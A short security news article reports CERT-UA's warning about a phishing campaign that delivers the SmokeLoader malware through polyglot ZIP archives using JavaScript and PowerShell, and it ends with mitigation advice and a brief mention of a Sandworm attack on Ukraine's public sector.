HQ/EMEAFind out how we can help your business
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned everyone regarding an ongoing phishing campaign that distributes the SmokeLoader malware that disguises itself as a polyglot archive.
The current investigation has yet to reveal the operators of the phishing campaign that distributes the malware. However, a report explained that the threat actors use emails from infected accounts concerning bills or payments. The emails also include an attachment like a ZIP archive.
The SmokeLoader operators use JavaScript to initiate cybercriminal operations and add more attacks.
According to investigations, the ongoing SmokeLoader phishing campaign leverages JavaScript that uses a PowerShell to download and run an executed to launch the malware.
In addition, the previously mentioned ZIP file is a polyglot archive containing a decoy document and a JavaScript file that uses PowerShell and could cause the executable file to be installed and operated. Subsequently, the process will allow the malicious actors to deploy the SmokeLoader malware.
The recent analysis of the campaign samples and domain name registration showed that the attack commenced last month since the date and the file compilation date includes April 2023.
The SmokeLoader malware behaves as a loader for other malware. This malware could inject malicious code into an infected running explorer process once the threat actors execute it into the system. In addition, the malware could download another payload onto the system.
As of now, the Ukrainian cybersecurity agency claimed that the attack came from a financially motivated threat group that could have been in the cybercriminal landscape for years. Moreover, the operators execute compromising attacks against accountants to steal credentials and perform unauthorised fund transfers.
Furthermore, CERT-UA noted that the actors commonly use JavaScript loaders in the initial stage of an attack. Hence, users should block the launch of wscript[.]exe on the PC to mitigate the chances of success of the attack.
Earlier this month, the cybersecurity agency also revealed a cyberattack executed by the Russia-backed Sandworm APT against the Ukraine public sector. The threat actors have allegedly acquired access to Ukraine’s public networks through VPN credentials.
